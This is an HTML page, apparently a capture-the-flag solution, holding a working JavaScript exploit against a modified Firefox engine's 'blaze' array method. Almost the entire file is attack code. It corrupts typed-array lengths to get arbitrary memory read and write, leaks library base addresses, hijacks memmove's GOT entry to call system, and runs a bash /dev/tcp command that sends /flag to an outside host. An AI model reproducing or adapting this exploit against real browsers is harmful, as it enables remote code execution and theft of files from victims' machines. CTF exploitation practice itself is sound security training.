Permalink
Cannot retrieve contributors at this time
<!DOCTYPE html> | |
<html> | |
<!-- flag{fire_just_makes_the_blaze_better} --> | |
<head> | |
<meta charset="utf-8"> | |
<script src="utils.js"></script> | |
<title></title> | |
<script type="text/javascript"> | |
function exploit() { | |
arr = [0x11223344]; | |
ab = new ArrayBuffer(32); | |
overwrite_len = new Uint32Array(ab); | |
overwrite_len[0] = 0x77777777; | |
victim_ab = new ArrayBuffer(32); | |
victim = new Uint32Array(victim_ab); | |
victim[0] = 0x88888888; | |
log("starting"); | |
arr.blaze(); | |
arr[7] = 0x10000; | |
var ptr_overwrite_idx = -1; | |
for (var i = 0; i < 1000; i++) { | |
if (overwrite_len[i] == 0x88888888) { | |
overwrite_len[i] = 0x98888888; | |
ptr_overwrite_idx = i; | |
break; | |
} | |
} | |
log(`ptr_overwrite_idx ${ptr_overwrite_idx} `); | |
if (ptr_overwrite_idx == -1) { | |
return; | |
} | |
// from https://github.com/phoenhex/files/blob/master/exploits/share-with-care/exploit.js | |
memory = { | |
prepare: function(addr, typed_array) { | |
x = new Int64(addr); | |
x.rshift(); | |
overwrite_len[ptr_overwrite_idx - 8] = x.lower(); | |
overwrite_len[ptr_overwrite_idx - 7] = x.upper(); | |
return new typed_array(victim_ab); | |
}, | |
write: function(addr, data) { | |
view = memory.prepare(addr, Uint32Array); | |
x = new Int64(data) | |
view[0] = x.lower(); | |
view[1] = x.upper(); | |
}, | |
read: function(addr) { | |
view = memory.prepare(addr, Uint32Array); | |
return new Int64(view[0] + 256 ** 4 * view[1]); | |
}, | |
readWithTag: function(addr) { | |
view = memory.prepare(addr, Uint32Array); | |
return new Int64(view[0] + 256 ** 4 * (view[1] & 0xffff)); | |
} | |
} | |
function leak_native(nat_func) { | |
victim_ab.yolo = nat_func; | |
victim_ab.haha = 0x13391339; | |
slots = overwrite_len[ptr_overwrite_idx - 13] * 2 ** 32 + overwrite_len[ptr_overwrite_idx - 12]; | |
slots_0 = (memory.readWithTag(slots).toInt()); | |
return memory.read(slots_0 + 5 * 8).toInt() | |
} | |
nat_func = leak_native(Date.now); | |
log("[+] Date.now @ " + nat_func.toString(16) + "\n"); | |
xul_base = nat_func - 0x49c7ab0; | |
memmove_got = xul_base + 0x0000818b220; | |
dup_got = xul_base + 0x0000818b738; | |
dup_libc = memory.read(dup_got); | |
libc_base = dup_libc - 0xf7940; | |
system_libc = libc_base + 0x45390; | |
log("[+] xul base @ " + xul_base.toString(16), true); | |
log("[+] memmove@got @ " + memmove_got.toString(16), true); | |
log("[+] libc_base@libc_@_" + libc_base.toString(16), true); | |
log("[+] system@libc @ " + system_libc.toString(16), true); | |
var target = new Uint8Array(100); | |
var cmd = "bash -ic 'cat /flag > /dev/tcp/my.host/12345' &"; | |
for (var i = 0; i < cmd.length; i++) { | |
target[i] = cmd.charCodeAt(i); | |
} | |
target[cmd.length] = 0; | |
memmove_backup = memory.read(memmove_got); | |
memory.write(memmove_got, system_libc); | |
target.copyWithin(0, 1); | |
memory.write(memmove_got, memmove_backup); | |
} | |
exploit(); | |
</script> | |
</head> | |
<body> | |
</body> | |
</html> | |
<!-- 0x00007f9c4b7a6138│+0xc8: 0x00007f9c4b7a70a0 → 0x8899001177889900 --> |